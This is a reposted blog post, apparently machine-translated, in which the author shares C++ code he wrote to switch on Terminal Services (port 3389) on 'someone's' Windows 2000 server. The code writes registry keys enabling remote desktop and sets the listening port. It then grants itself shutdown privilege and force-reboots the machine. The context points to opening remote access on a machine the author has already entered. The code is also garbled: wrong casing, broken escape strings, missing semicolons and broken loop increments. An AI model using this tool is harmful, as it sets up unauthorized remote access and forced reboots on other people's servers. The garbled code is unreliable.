2. Tech
  3. On 3389 code (.cpp)

On 3389 code (.cpp)

xiaoxiao2021-03-06  73

Well, this thing has been discussed many times, but I used it today: I wanted to open someone on Terminal service when playing, I found a lot of articles, but the tool couldn't come down, I had to write one. I laughed. Success on a server of a 2000Server SP3.

#include "windows.h"

#include "iostream.h"

Void main (int Argc, char * argv [])

{

HKEY HKEY;

Handle HProcess, HTOKEN

Token_privileges newstate;

DWORD processID, returnitionth = 0;

Luid LuidPrivilegeluid;

LPCTSTR Key [] = {"Software // Microsoft // Windows // CurrentVersion // Netcache //",

"Software // policies // microsoft // windows // installer //",

"System // CurrentControlset // Control // Terminal Server //",

"System // CurrentControlset // Services // Termdd //",

"System // CurrentControlset // Services // TermService //",

"System // CurrentControlset // Control // Terminal Server // WinStations // RDP-TCP //",

".Default // Keyboard Layout // Toggle //"};

HKEY Head [] = {HKEY_LOCAL_MACHINE, HKEY_LOCAL_MACHINE,

HKEY_LOCAL_MACHINE, HKEY_LOCAL_MACHINE,

HKEY_LOCAL_MACHINE, HKEY_LOCAL_MACHINE,

HKEY_USERS}

DWORD TYPE [] = {REG_DWORD, REG_DWORD, REG_DWORD, REG_DWORD, REG_DWORD, REG_DWORD, REG_SZ};

LPCTSTST VALUE [] = {"/ x00 / x00 / x00 / x00", "/ x01 / x00 / x00 / x00", "/ x01 / x00 / x00 / x00", "/ x02 / x00 / x00 / x00", "/ x02 / x00 / x00 / x00", "/ x3d / x0d / x00 / 00", "2"};

DWORD Length [] = {4, 4, 4, 4, 4, 4, 2};

LPCTSTR Name [] = {"Enabled", "EnableadmintSremote", "Tsenabled", "Start", "Start", "Portnumber", "Hotkey"}

For (int i = 0; i <2; i )

RegcreateKeyex (Head [i], key [i], 0, null, reg_option_non_volatile, key_write, null, & hkey, null;

For (i = 0; i <7; i )

{

IF (:: regopenkeyex (Head [i], key [i], 0, key_write, & hkey)! = error_success) {

Cout << "Error Opening Register ... / N";

Return;

}

IF (: regSetValueex (HKEY, NAME [I], 0, Type [i], (lpbyte) Value [i], length [i])! = error_success)

{

Cout << "Error Writing Register ... / N";

Return;

}

}

Processid = getCurrentProcessId ();

HProcess = OpenProcess (process_all_access, false, processid;

IF (! openprocessToken (hprocess, token_adjust_privileges, & htokeen)

||! Lookuppprivilerage (NULL, SE_SHUTDOWN_NAME, & LuidprivileGeluid))

{

Cout << "Error! Try Iisreset.exe / Reboot To Reboot System!";

Return;

}

NEWSTATE.PRIVILEGECOUNT = 1;

NewState.privileges [0] .luid = LuidPrivileGEluId;

Newstate.privileges [0] .attributes = se_privilege_enable;

IF (AdjustTokenPrivilegeg (HToken, False, & NewState, Null, Null, Null)

EXITWINDOWSEX (EWX_FORCE | EWX_REBOOT, 0);

Return;

}

转载请注明原文地址:https://www.9cbs.com/read-92444.html

9cbs

New Post(0)